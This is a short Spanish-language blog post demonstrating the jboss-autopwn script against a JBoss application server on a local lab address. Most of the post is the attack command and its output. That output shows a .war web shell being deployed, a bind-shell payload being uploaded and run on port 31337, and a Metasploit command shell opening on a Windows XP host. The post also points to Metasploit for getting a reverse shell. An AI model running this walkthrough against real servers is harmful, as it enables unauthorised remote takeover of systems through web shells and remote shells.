JBoss es un servidor de aplicaciones J2EE, de código abierto muy popular, esta escrito en Java, que lo convierte en multiplataforma, lo corren tanto Windows, como Linux, Mac, etc..
Ahora veamos un bind shell utilizando el script que realizo la gente de SpiderLabs
root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/nulltambién se podría complementar con metasploit para lograr un reverse shell, recomiendo ver los ejemplos q esta en la documentacion oficial.
[x] Retrieving cookie
[x] Now creating BSH script...
[x] .war file created succesfully on c:
[x] Now deploying .war file:
[x] Web shell enabled!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp
[x] Server name...:
Host Name . . . . . . . . . . . . : aquarius
[x] Would you like a reverse or bind shell or vnc(bind)? bind
[x] On which port would you like your bindshell to listen? 31337
[x] Uploading bindshell payload..
[x] Checking that bind shell was uploaded correctly..
[x] Bind shell uploaded: 22/11/2009 18:35 87,552 payload.exe
[x] Now executing bind shell...
[x] Executed bindshell!
[x] Reverting to metasploit....
[*] Started bind handler
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.2:60535 -> 192.168.1.225:31337)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\chris\Desktop\jboss-4.2.3.GA\server\default\tmp\deploy\tmp8376972724011216327browserwin-exp.war>
Para mas información ...
https://github.com/SpiderLabs/jboss-autopwn
http://www.jboss.org/
No hay comentarios:
Publicar un comentario